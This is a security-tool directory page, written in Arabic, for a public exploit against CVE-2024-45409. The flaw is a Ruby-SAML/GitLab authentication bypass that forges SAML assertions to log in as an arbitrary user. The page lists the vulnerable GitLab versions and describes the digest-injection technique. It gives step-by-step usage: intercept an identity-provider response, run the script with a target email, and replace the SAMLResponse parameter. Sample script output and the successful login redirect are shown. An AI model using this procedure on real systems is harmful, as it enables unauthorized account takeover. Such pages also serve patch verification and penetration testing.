Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-45409 — استغلال ثغرة تجاوز المصادقة في Ruby-SAML / GitLab (CVE-2024-45409) | Kitploit
أدوات/GitHubGitHub/synacktiv/cve-2024-45409
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubsynacktiv/cve-2024-45409

CVE-2024-45409

استغلال ثغرة تجاوز المصادقة في Ruby-SAML / GitLab (CVE-2024-45409)

عرض المستودع
8413منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال Ruby-SAML / GitLab لتجاوز المصادقة (CVE-2024-45409)

يستغل هذا السكربت الثغرة CVE-2024-45409 التي تسمح لمهاجم غير مصادَق يملك إمكانية الوصول إلى أي مستند SAML موقَّع صادر عن موفر الهوية (IDP) بتزوير استجابة/تأكيد SAML والوصول إلى GitLab كمستخدم عشوائي.

جميع إصدارات GitLab (CE/EE) التالية معرضة للثغرة:

  • < 16.11.10
  • 17.0.0 < 17.0.8
  • 17.0.0 < 17.1.8
  • 17.0.0 < 17.2.7
  • 17.0.0 < 17.3.3

يحقن هذا الاستغلال DigestValue للتأكيد المعدَّل في عنصر StatusDetail، مما يسمح بتمرير محدد XPath الذي سيستخدم هذه القيمة بدلاً من القيمة الموجودة في كتلة SignedInfo.

المتطلبات

  • استجابة SAML صالحة صادرة عن موفر الهوية (IDP)

الاستخدام

root@kitploit:~
apt install python3-lxml

اعترض عنوان URL واستجابة SAML الخاصة بموفر الهوية والمشفّرة بـ Base64 أولاً، ثم عدّل محتوى XML باستخدام السكربت.

root@kitploit:~
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
root@kitploit:~
$ python3 CVE-2024-45409.py -r response.url_base64 -n [email protected] -d -e -o response_patched.url_base64
[+] Parse response
	Digest algorithm: sha256
	Canonicalization Method: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Remove signature from response
[+] Patch assertion ID
[+] Patch assertion NameID
[+] Patch assertion conditions
[+] Move signature in assertion
[+] Patch response ID
[+] Insert malicious reference
[+] Clone signature reference
[+] Create status detail element
[+] Patch digest value
[+] Write patched file in response_patched.url_base64

بعد ذلك، استبدل قيمة المعامل SAMLResponse بمخرجات السكربت. إذا نجحت المصادقة، ستتم إعادة توجيهك إلى الصفحة الرئيسية لـ GitLab.

root@kitploit:~
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>You are being <a href="http://gitlab.test.local/">redirected</a>.</body></html>

المراجع

  • https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
  • https://github.com/advisories/GHSA-jw9c-mfg7-9rx2
  • https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-45409
  • https://www.cvedetails.com/cve/CVE-2024-45409/
تنزيل الأداة